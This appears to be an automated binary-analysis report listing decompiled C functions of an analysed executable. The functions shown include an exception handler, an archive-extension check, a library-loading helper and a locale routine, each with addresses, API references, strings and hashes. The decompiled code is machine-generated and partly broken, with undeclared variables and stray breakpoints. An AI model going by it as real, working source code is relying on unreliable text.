Download Yara Rule

C-Code - Quality: 67%

			E00203370(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E00227717(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0x247050;
				E00203330(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x247050);
				E002043FC(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E002046B0(_t77, 0xfffffffe, _t96, 0x247050);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E00204650(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E00203330(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x22ea8c;
											if(__eflags != 0) {
												_t72 = E00227110(__eflags, 0x22ea8c);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0x22ea8c; // 0x202dca
													 *0x22d3b0(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E00204690(_a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E002046B0(_t64, _t93, _t96, 0x247050);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E00203330(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E00204670();
										asm("int3");
										__eflags = E002046C7();
										if(__eflags != 0) {
											_t67 = E00203633(_t86, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E00204703();
												goto L23;
											}
										} else {
											L23:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L27;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L27:
			}

0x00203370
0x00203377
0x0020337b
0x0020337c
0x00203382
0x0020338e
0x00203390
0x00203396
0x00203396
0x0020339f
0x002033a1
0x002033a4
0x002033a7
0x002033af
0x002033b4
0x002033b7
0x002033ba
0x002033c1
0x0020341d
0x00203420
0x00203428
0x0020342f
0x00000000
0x0020342f
0x00000000
0x002033c3
0x002033c3
0x002033c9
0x002033cf
0x002033d5
0x00203440
0x00203449
0x002033d7
0x002033d7
0x002033d7
0x002033dd
0x002033e0
0x002033e3
0x002033e6
0x002033e9
0x002033ee
0x00203404
0x00000000
0x002033f0
0x002033f0
0x002033f2
0x002033f7
0x002033f9
0x002033fc
0x002033fe
0x00203414
0x00203434
0x00203434
0x00203438
0x00000000
0x00203400
0x00203400
0x0020344a
0x0020344d
0x00203453
0x00203455
0x0020345c
0x00203463
0x00203468
0x0020346b
0x0020346d
0x0020346f
0x0020347c
0x00203482
0x00203484
0x00203487
0x00203487
0x0020348a
0x0020348a
0x0020345c
0x00203490
0x00203492
0x00203497
0x0020349a
0x0020349d
0x002034a5
0x002034a9
0x002034ae
0x002034ae
0x002034b1
0x002034b5
0x002034b8
0x002034c5
0x002034c8
0x002034cd
0x002034d3
0x002034d5
0x002034da
0x002034df
0x002034e1
0x002034ec
0x002034e3
0x002034e3
0x00000000
0x002034e3
0x002034d7
0x002034d7
0x002034d7
0x002034d9
0x002034d9
0x00203402
0x00000000
0x00203402
0x00203400
0x002033fe
0x00000000
0x00203407
0x00203407
0x00203409
0x00203410
0x00000000
0x00203412
0x00000000
0x00203410
0x002033d5
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 002033A7
___except_validate_context_record.LIBVCRUNTIME ref: 002033AF
_ValidateLocalCookies.LIBCMT ref: 00203438
__IsNonwritableInCurrentImage.LIBCMT ref: 00203463
_ValidateLocalCookies.LIBCMT ref: 002034B8
___vcrt_initialize_locks.LIBVCRUNTIME ref: 002034CE
___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 002034E3

Strings

csm, xrefs: 0020344D

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
String ID: csm
API String ID: 1385549066-1018135373
Opcode ID: a8787746f183ab172b8e9f5250ab12b3adbd9446b5e2721805d570f47423f46d
Instruction ID: 5de93e68257fb4380702c64092d18bc7fe7134a7f430bd32ab555a8f06d45301
Opcode Fuzzy Hash: a8787746f183ab172b8e9f5250ab12b3adbd9446b5e2721805d570f47423f46d
Instruction Fuzzy Hash: 2D41C434A20345ABCF11EF68D884A9EBBB8AF45314F14C095E9145F3D3D731AA25CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001FD8A5, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001FD8A5(void* __ecx, void* __eflags) {
				void* _t31;
				char* _t32;
				void* _t34;

				_t31 = __ecx;
				_t32 = _t31 + E0020B890(__ecx);
				while(1) {
					_t34 = _t32 - _t31;
					if(_t34 <= 0) {
						break;
					}
					if( *_t32 == 0x2e) {
						L6:
						if(E00211E4A(_t32, ".Z") == 0 || E00211E4A(_t32, ?str?) == 0 || E00211E4A(_t32, ".zoo") == 0 || E00211E4A(_t32, ".arc") == 0 || E00211E4A(_t32, ".lzh") == 0 || E00211E4A(_t32, ".arj") == 0 || E00211E4A(_t32, ".gz") == 0 || E00211E4A(_t32, ".tgz") == 0) {
							return 1;
						} else {
							L14:
							return 0;
						}
					}
					_t32 = _t32 - 1;
				}
				if(_t34 != 0 ||  *_t32 == 0x2e) {
					goto L6;
				} else {
					goto L14;
				}
			}

0x001fd8a7
0x001fd8b0
0x001fd8bb
0x001fd8bb
0x001fd8bd
0x00000000
0x00000000
0x001fd8b8
0x001fd8ca
0x001fd8d9
0x00000000
0x001fd952
0x001fd952
0x00000000
0x001fd952
0x001fd8d9
0x001fd8ba
0x001fd8ba
0x001fd8bf
0x00000000
0x00000000
0x00000000
0x00000000

APIs

_strlen.LIBCMT ref: 001FD8AA

Strings

.arj, xrefs: 001FD91F
.gz, xrefs: 001FD930
.tgz, xrefs: 001FD941
.zip, xrefs: 001FD8DB
.lzh, xrefs: 001FD90E
.arc, xrefs: 001FD8FD
.zoo, xrefs: 001FD8EC

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 4218353326-51310709
Opcode ID: 7f66013c95748ac1f3eb4c52a656de16065ec873343161c3589ecc2a74ee0934
Instruction ID: db04ee4b0d98ab08c69daafe62459058c1ba636ae2feae680f1bd0757ad34478
Opcode Fuzzy Hash: 7f66013c95748ac1f3eb4c52a656de16065ec873343161c3589ecc2a74ee0934
Instruction Fuzzy Hash: 3A11E952668B1765273A25747C036BB03CD6E937F4766002AFB28A04C1EF9494F1896C

Uniqueness

Uniqueness Score: -1.00%

Function 00218774, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00218774(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x24bfa0 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x231628 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00216708(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00216708(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x0021877d
0x00218827
0x00218785
0x00218787
0x0021878e
0x00218790
0x00218796
0x002187a3
0x002187b8
0x002187bc
0x0021880e
0x0021880e
0x00218813
0x00218817
0x0021881a
0x0021881a
0x00218820
0x00218822
0x00218837
0x00218832
0x00218836
0x00218836
0x00218824
0x00218824
0x00000000
0x00218824
0x002187be
0x002187c7
0x002187fe
0x002187fe
0x00218800
0x00218802
0x00000000
0x00000000
0x0021880a
0x00000000
0x0021880a
0x002187d1
0x002187d6
0x002187db
0x00000000
0x00000000
0x002187e5
0x002187ea
0x002187ef
0x00000000
0x00000000
0x002187f4
0x002187fa
0x00000000
0x002187fa
0x0021879b
0x00000000
0x00000000
0x00000000
0x002187a1
0x00218830
0x00000000

Strings

ext-ms-, xrefs: 002187DF
api-ms-, xrefs: 002187CB
4hU@[Y]W, xrefs: 0021877A, 0021877C, 002187B1, 002187D0, 002187E4, 002187F3

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 4hU@[Y]W$api-ms-$ext-ms-
API String ID: 0-3467634237
Opcode ID: 1a74b36b5d59156f68b68971077029a382426e50e5852653528a51c204e3f7bc
Instruction ID: 1548a82dc24eb06a8a587f09dfe13695e65143d6a0a1281de2099de2a824511d
Opcode Fuzzy Hash: 1a74b36b5d59156f68b68971077029a382426e50e5852653528a51c204e3f7bc
Instruction Fuzzy Hash: 04212E7692121AB7CB315F64ACC4A9B77D99F21760F261120ED05A71D0DF70DC62D5E0

Uniqueness

Uniqueness Score: -1.00%

Function 00215D95, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00215D95(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int* _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int* _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t151;
				void* _t158;
				signed int _t159;
				signed int _t161;
				signed int _t162;
				intOrPtr _t163;
				signed int _t166;
				signed int _t168;
				signed int _t169;
				signed int _t172;
				signed int _t173;
				signed int _t176;
				signed int _t177;
				signed int _t179;
				signed int _t180;
				signed int _t198;
				signed int _t200;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				void* _t210;
				signed int _t217;
				intOrPtr* _t218;
				char* _t225;
				signed int _t227;
				intOrPtr _t230;
				intOrPtr* _t231;
				signed int _t233;
				signed int* _t237;
				signed int _t238;
				intOrPtr _t245;
				void* _t246;
				void* _t249;
				signed int _t251;
				signed int _t253;
				signed int _t256;
				signed int* _t257;
				intOrPtr* _t258;
				short _t259;
				signed int _t261;
				signed int _t265;
				void* _t267;
				void* _t269;

				_t243 = __edx;
				_t261 = _t265;
				_t151 =  *0x247050; // 0xc1fc8d92
				_v8 = _t151 ^ _t261;
				_push(__ebx);
				_t209 = _a8;
				_push(__esi);
				_push(__edi);
				_t245 = _a4;
				_v736 = _t209;
				_v724 = E002171CB(__ecx, __edx) + 0x278;
				_t158 = E00215480(_t209, __edx, _t245, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v712);
				_t267 = _t265 - 0x2e4 + 0x18;
				if(_t158 == 0) {
					L40:
					_t159 = 0;
					__eflags = 0;
					goto L41;
				} else {
					_t251 = _t209 + 2 << 4;
					_t161 =  &_v272;
					_v716 = _t251;
					_t243 =  *(_t251 + _t245);
					_t217 = _t243;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t253 = _v716;
						if( *_t161 !=  *_t217) {
							break;
						}
						if( *_t161 == 0) {
							L7:
							_t162 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t161 + 2));
							_v706 = _t259;
							_t253 = _v716;
							if(_t259 !=  *((intOrPtr*)(_t217 + 2))) {
								break;
							} else {
								_t161 = _t161 + 4;
								_t217 = _t217 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L7;
								}
							}
						}
						L9:
						if(_t162 != 0) {
							_t218 =  &_v272;
							_t243 = _t218 + 2;
							do {
								_t163 =  *_t218;
								_t218 = _t218 + 2;
								__eflags = _t163 - _v704;
							} while (_t163 != _v704);
							_v720 = (_t218 - _t243 >> 1) + 1;
							_t166 = E0021918E(4 + ((_t218 - _t243 >> 1) + 1) * 2);
							_v732 = _t166;
							__eflags = _t166;
							if(_t166 == 0) {
								goto L40;
							} else {
								_v728 =  *((intOrPtr*)(_t253 + _t245));
								_v740 =  *(_t245 + 0xa0 + _t209 * 4);
								_v744 =  *(_t245 + 8);
								_t225 =  &_v272;
								_v708 = _t166 + 4;
								_t168 = E00219DBB(_t166 + 4, _v720, _t225);
								_t269 = _t267 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									L002067FE();
									asm("int3");
									_push(_t261);
									_push(_t225);
									_v784 = _v784 & 0x00000000;
									_t172 = E00218BA4(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t172;
									if(_t172 == 0) {
										L50:
										_t173 = 0xfde9;
									} else {
										_t173 = _v12;
										__eflags = _t173;
										if(_t173 == 0) {
											goto L50;
										}
									}
									return _t173;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t245)) = _v708;
									if(_v272 != 0x43) {
										L18:
										_t176 = E0021519D(_t209, _t245,  &_v700);
										_t227 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L18;
										} else {
											_t227 = _v704;
											_t176 = _t227;
										}
									}
									 *(_t245 + 0xa0 + _t209 * 4) = _t176;
									__eflags = _t209 - 2;
									if(_t209 != 2) {
										__eflags = _t209 - 1;
										if(_t209 != 1) {
											__eflags = _t209 - 5;
											if(_t209 == 5) {
												 *((intOrPtr*)(_t245 + 0x14)) = _v712;
											}
										} else {
											 *((intOrPtr*)(_t245 + 0x10)) = _v712;
										}
									} else {
										_t257 = _v724;
										_t243 = _t227;
										_t237 = _t257;
										 *(_t245 + 8) = _v712;
										_v708 = _t257;
										_v720 = _t257[8];
										_v712 = _t257[9];
										while(1) {
											__eflags =  *(_t245 + 8) -  *_t237;
											if( *(_t245 + 8) ==  *_t237) {
												break;
											}
											_t258 = _v708;
											_t243 = _t243 + 1;
											_t207 =  *_t237;
											 *_t258 = _v720;
											_v712 = _t237[1];
											_t237 = _t258 + 8;
											 *((intOrPtr*)(_t258 + 4)) = _v712;
											_t209 = _v736;
											_t257 = _v724;
											_v720 = _t207;
											_v708 = _t237;
											__eflags = _t243 - 5;
											if(_t243 < 5) {
												continue;
											} else {
											}
											L26:
											__eflags = _t243 - 5;
											if(__eflags == 0) {
												_t198 = E0021D974(_t243, __eflags, _v704, 1, 0x230ff8, 0x7f,  &_v528,  *(_t245 + 8), 1);
												_t269 = _t269 + 0x1c;
												__eflags = _t198;
												if(_t198 == 0) {
													_t238 = _v704;
												} else {
													_t200 = _v704;
													do {
														 *(_t261 + _t200 * 2 - 0x20c) =  *(_t261 + _t200 * 2 - 0x20c) & 0x000001ff;
														_t200 = _t200 + 1;
														__eflags = _t200 - 0x7f;
													} while (_t200 < 0x7f);
													_t202 = E00201D5D( &_v528,  *0x2471c4, 0xfe);
													_t269 = _t269 + 0xc;
													__eflags = _t202;
													_t238 = 0 | _t202 == 0x00000000;
												}
												_t257[1] = _t238;
												 *_t257 =  *(_t245 + 8);
											}
											 *(_t245 + 0x18) = _t257[1];
											goto L38;
										}
										__eflags = _t243;
										if(_t243 != 0) {
											 *_t257 =  *(_t257 + _t243 * 8);
											_t257[1] =  *(_t257 + 4 + _t243 * 8);
											 *(_t257 + _t243 * 8) = _v720;
											 *(_t257 + 4 + _t243 * 8) = _v712;
										}
										goto L26;
									}
									L38:
									_t177 = _t209 * 0xc;
									_t106 = _t177 + 0x231080; // 0x1d1ec3
									 *0x22d3b0(_t245);
									_t179 =  *((intOrPtr*)( *_t106))();
									_t230 = _v728;
									__eflags = _t179;
									if(_t179 == 0) {
										__eflags = _t230 - 0x2472d0;
										if(_t230 == 0x2472d0) {
											L45:
											_t180 = _v716;
										} else {
											_t256 = _t209 + _t209;
											__eflags = _t256;
											asm("lock xadd [eax], ecx");
											if(_t256 != 0) {
												goto L45;
											} else {
												E00217FE3( *((intOrPtr*)(_t245 + 0x28 + _t256 * 8)));
												E00217FE3( *((intOrPtr*)(_t245 + 0x24 + _t256 * 8)));
												E00217FE3( *(_t245 + 0xa0 + _t209 * 4));
												_t180 = _v716;
												_t233 = _v704;
												 *(_t180 + _t245) = _t233;
												 *(_t245 + 0xa0 + _t209 * 4) = _t233;
											}
										}
										_t231 = _v732;
										 *_t231 = 1;
										_t159 =  *(_t180 + _t245);
										 *((intOrPtr*)(_t245 + 0x28 + (_t209 + _t209) * 8)) = _t231;
									} else {
										 *((intOrPtr*)(_v716 + _t245)) = _t230;
										E00217FE3( *(_t245 + 0xa0 + _t209 * 4));
										 *(_t245 + 0xa0 + _t209 * 4) = _v740;
										E00217FE3(_v732);
										 *(_t245 + 8) = _v744;
										goto L40;
									}
									goto L41;
								}
							}
						} else {
							_t159 = _t243;
							L41:
							_pop(_t246);
							_pop(_t249);
							_pop(_t210);
							return L002007E2(_t159, _t210, _v8 ^ _t261, _t243, _t246, _t249);
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t162 = _t161 | 0x00000001;
					__eflags = _t162;
					goto L9;
				}
				L52:
			}

0x00215d95
0x00215d98
0x00215da0
0x00215da7
0x00215daa
0x00215dab
0x00215dae
0x00215db2
0x00215db3
0x00215db6
0x00215dc6
0x00215de9
0x00215dee
0x00215df3
0x002160cb
0x002160cb
0x002160cb
0x00000000
0x00215df9
0x00215dfc
0x00215dff
0x00215e05
0x00215e0b
0x00215e0e
0x00215e10
0x00215e13
0x00215e1d
0x00215e23
0x00000000
0x00000000
0x00215e29
0x00215e52
0x00215e52
0x00215e2b
0x00215e2b
0x00215e33
0x00215e3a
0x00215e40
0x00000000
0x00215e42
0x00215e42
0x00215e45
0x00215e50
0x00000000
0x00000000
0x00000000
0x00000000
0x00215e50
0x00215e40
0x00215e5f
0x00215e61
0x00215e6a
0x00215e70
0x00215e73
0x00215e73
0x00215e76
0x00215e79
0x00215e79
0x00215e89
0x00215e97
0x00215e9c
0x00215ea3
0x00215ea5
0x00000000
0x00215eab
0x00215eb1
0x00215ebe
0x00215ec7
0x00215ecd
0x00215eda
0x00215ee1
0x00215ee6
0x00215ee9
0x00215eeb
0x0021614b
0x00216151
0x00216152
0x00216153
0x00216154
0x00216155
0x00216156
0x0021615b
0x0021615e
0x00216161
0x00216162
0x00216174
0x00216179
0x0021617b
0x00216184
0x00216184
0x0021617d
0x0021617d
0x00216180
0x00216182
0x00000000
0x00000000
0x00216182
0x0021618a
0x00215ef1
0x00215ef1
0x00215eff
0x00215f02
0x00215f18
0x00215f1f
0x00215f25
0x00215f04
0x00215f04
0x00215f0c
0x00000000
0x00215f0e
0x00215f0e
0x00215f14
0x00215f14
0x00215f0c
0x00215f2b
0x00215f32
0x00215f35
0x00216055
0x00216058
0x00216065
0x00216068
0x00216070
0x00216070
0x0021605a
0x00216060
0x00216060
0x00215f3b
0x00215f3b
0x00215f41
0x00215f49
0x00215f4b
0x00215f4e
0x00215f57
0x00215f60
0x00215f66
0x00215f69
0x00215f6b
0x00000000
0x00000000
0x00215f6d
0x00215f73
0x00215f74
0x00215f7f
0x00215f87
0x00215f8f
0x00215f92
0x00215f95
0x00215f9b
0x00215fa1
0x00215fa7
0x00215fad
0x00215fb0
0x00000000
0x00000000
0x00215fb2
0x00215fd7
0x00215fd7
0x00215fda
0x00215ff7
0x00215ffc
0x00215fff
0x00216001
0x0021603f
0x00216003
0x00216003
0x00216009
0x0021600e
0x00216016
0x00216017
0x00216017
0x0021602e
0x00216035
0x00216038
0x0021603a
0x0021603a
0x00216045
0x0021604b
0x0021604b
0x00216050
0x00000000
0x00216050
0x00215fb4
0x00215fb6
0x00215fbb
0x00215fc1
0x00215fca
0x00215fd3
0x00215fd3
0x00000000
0x00215fb6
0x00216073
0x00216073
0x00216077
0x0021607f
0x00216085
0x00216088
0x0021608e
0x00216090
0x002160dc
0x002160e2
0x0021612e
0x0021612e
0x002160e4
0x002160e9
0x002160e9
0x002160ef
0x002160f3
0x00000000
0x002160f5
0x002160f9
0x00216102
0x0021610e
0x00216113
0x0021611c
0x00216122
0x00216125
0x00216125
0x002160f3
0x00216134
0x0021613c
0x00216142
0x00216145
0x00216092
0x00216098
0x002160a2
0x002160b4
0x002160bb
0x002160c8
0x00000000
0x002160c8
0x00000000
0x00216090
0x00215eeb
0x00215e63
0x00215e63
0x002160cd
0x002160d0
0x002160d1
0x002160d4
0x002160db
0x002160db
0x00000000
0x00215e61
0x00215e5a
0x00215e5c
0x00215e5c
0x00000000
0x00215e5c
0x00000000

APIs

Part of subcall function 002171CB: GetLastError.KERNEL32(?,?,00000000,00212010,?,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C), ref: 002171D0
Part of subcall function 002171CB: SetLastError.KERNEL32(00000000,00000007,000000FF,?,001FEC7B,001D4BC9,?,?,?,00000000,?,?,?,001DA54C,?), ref: 0021726E

_free.LIBCMT ref: 002160A2
_free.LIBCMT ref: 002160BB
_free.LIBCMT ref: 002160F9
_free.LIBCMT ref: 00216102
_free.LIBCMT ref: 0021610E

Strings

C, xrefs: 00215EF1

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: c1c0289c34d4ce856e11267ac963f37bc7f1e3b4e3e2f7034634131fd10938fe
Instruction ID: ce531df56ef9da6630d0a207c9404200f80f156004b1f871305d18fbe144c08d
Opcode Fuzzy Hash: c1c0289c34d4ce856e11267ac963f37bc7f1e3b4e3e2f7034634131fd10938fe
Instruction Fuzzy Hash: D2B11A7591162ADBDB24DF18C888AEDB7F5FB58304F1045EAE809A7291D771AEE0CF40

Uniqueness

Uniqueness Score: -1.00%

Function 001FF14A, Relevance: 10.7, APIs: 7, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E001FF14A(void* __ecx, signed char __edx) {
				intOrPtr _v8;
				signed int _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v44;
				void _v56;
				signed char _v68;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v100;
				signed char _v101;
				long _v108;
				signed char _v112;
				char _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t74;
				signed char _t77;
				signed char _t80;
				long _t81;
				long _t88;
				signed int _t89;
				signed int _t118;
				signed int _t120;
				signed char _t121;
				unsigned int _t126;
				signed char _t129;
				intOrPtr* _t131;
				void* _t132;
				long _t133;
				WCHAR* _t135;
				void* _t136;
				intOrPtr _t137;
				signed int _t142;

				_t129 = __edx;
				_t118 = _t142;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t118 + 4));
				_t140 = (_t142 & 0xfffffff8) + 4;
				_t74 =  *0x247050; // 0xc1fc8d92
				_v16 = _t74 ^ (_t142 & 0xfffffff8) + 0x00000004;
				_t120 =  *(_t118 + 0x10);
				_t135 =  *(_t118 + 8);
				_t77 = _t120 & 0x00000001;
				_t121 = _t120 & 0xfffffffe;
				_v101 = _t77;
				 *(_t118 + 0x10) = _t121;
				_t131 =  *((intOrPtr*)(_t118 + 0xc));
				if(_t77 == 0 || (_t121 >> 0x00000002 & 0x00000001) == 0) {
					_t129 =  *(_t118 + 0x14);
					if((_t121 >> 0x00000001 & 0x00000001) == 0 || _t129 == 0xffffffff) {
						_t80 = _v101;
					} else {
						_t80 = _v101;
						if((_t129 >> 0x0000000a & 0x00000001) == 0 || _t80 == 0) {
							_t121 = _t121 & 0xfffffffd;
							 *(_t131 + 0x10) = _t129;
							 *(_t118 + 0x10) = _t121;
						}
					}
					if(_t121 == 0) {
						L37:
						_t81 = 0;
						goto L38;
					} else {
						if((_t121 & 0x0000002a) == 0 || _t129 != 0xffffffff && (_t129 & 0x00000001) != 0 && _t80 != 0) {
							L20:
							_t88 = E001FF339( &_v116, _t135, 0x80, (_t80 & 0x000000ff ^ 0x00000001) + 0x10 << 0x15);
							_t137 = _v116;
							_v108 = _t88;
							if(_t88 == 0) {
